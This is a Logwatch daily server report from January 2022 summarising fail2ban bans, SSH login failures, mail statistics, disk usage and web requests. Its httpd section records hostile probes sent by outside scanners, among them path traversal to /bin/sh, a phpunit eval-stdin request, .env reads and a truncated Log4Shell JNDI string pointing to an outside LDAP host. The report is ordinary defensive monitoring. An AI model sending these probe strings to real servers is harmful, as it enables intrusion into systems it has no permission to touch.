################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sun Jan 2 04:42:04 2022 Date Range Processed: yesterday ( 2022-Jan-01 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 13:13 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 45.88.109.151 -> 49.12.205.139:4444: 1 Time(s) 54.183.214.154 -> zapf.wiki:443: 2 Time(s) 92.118.234.202 -> zapf.wiki:443: 9 Time(s) A total of 6 sites probed the server 159.223.48.169 178.239.21.103 185.142.236.40 185.163.109.66 195.133.40.56 20.114.43.135 Requests with error response codes 400 Bad Request zapf.wiki:443: 11 Time(s) null: 7 Time(s) /phpmyadmin/scripts/setup.php: 4 Time(s) /: 3 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s) /27383555: 1 Time(s) /admin/config.php: 1 Time(s) /goettingen: 1 Time(s) 49.12.205.139:4444: 1 Time(s) 7: 1 Time(s) mstshash=Administr: 1 Time(s) 500 Internal Server Error /: 21 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 3 Time(s) /.env: 2 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /owa/auth/logon.aspx: 2 Time(s) ///remote/fgt_lang?lang=/../../../..//////////dev/: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /Telerik.Web.UI.WebResource.axd?type=rau: 1 Time(s) /_ignition/execute-solution: 1 Time(s) /actuator/health: 1 Time(s) /bag2: 1 Time(s) /cgi-bin/config.exp: 1 Time(s) /console/: 1 Time(s) /epa/scripts/win/nsepa_setup.exe: 1 Time(s) /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) 502 Bad Gateway /D1lk7Eb3Squ7uGiIXiErNg/pdf: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (103.161.39.186): 28 Time(s) root (197.255.225.96): 18 Time(s) root (106.12.220.24): 17 Time(s) root (124.43.9.184): 17 Time(s) unknown (103.161.39.186): 14 Time(s) unknown (106.12.220.24): 10 Time(s) unknown (144.126.208.202): 9 Time(s) root (185.74.4.189): 7 Time(s) unknown (185.74.4.189): 6 Time(s) unknown (124.43.9.184): 5 Time(s) unknown (197.255.225.96): 4 Time(s) root (167.99.88.94): 1 Time(s) unknown (185.90.136.69): 1 Time(s) unknown (slot0.epaperitaliait.com): 1 Time(s) Invalid Users: Unknown Account: 50 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 10.902K Bytes accepted 11,164 10.902K Bytes sent via SMTP 11,164 ======== ================================================== 2 Accepted 100.00% -------- -------------------------------------------------- 2 Total 100.00% ======== ================================================== 4 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 4 Total 4xx Rejects 100.00% ======== ================================================== 254 Connections 66 Connections lost (inbound) 254 Disconnections 2 Removed from queue 2 Sent via SMTP ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 103.161.39.186: 28 times 106.12.220.24: 17 times 124.43.9.184: 17 times 167.99.88.94: 1 time 185.74.4.189: 7 times 197.255.225.96: 18 times Illegal users from: 2001:470:1:c84::29: 1 time undef: 36 times 64.62.197.92: 1 time 103.161.39.186: 14 times 106.12.220.24: 10 times 106.75.184.237 (szfbk.cn): 1 time 124.43.9.184: 5 times 144.126.208.202: 9 times 185.74.4.189: 6 times 185.90.136.69 (ksort-fi41-sort.betmam.com): 1 time 195.133.18.24 (slot0.epaperitaliait.com): 1 time 197.255.225.96: 4 times **Unmatched Entries** Protocol major versions differ for 134.122.134.188: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Server : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################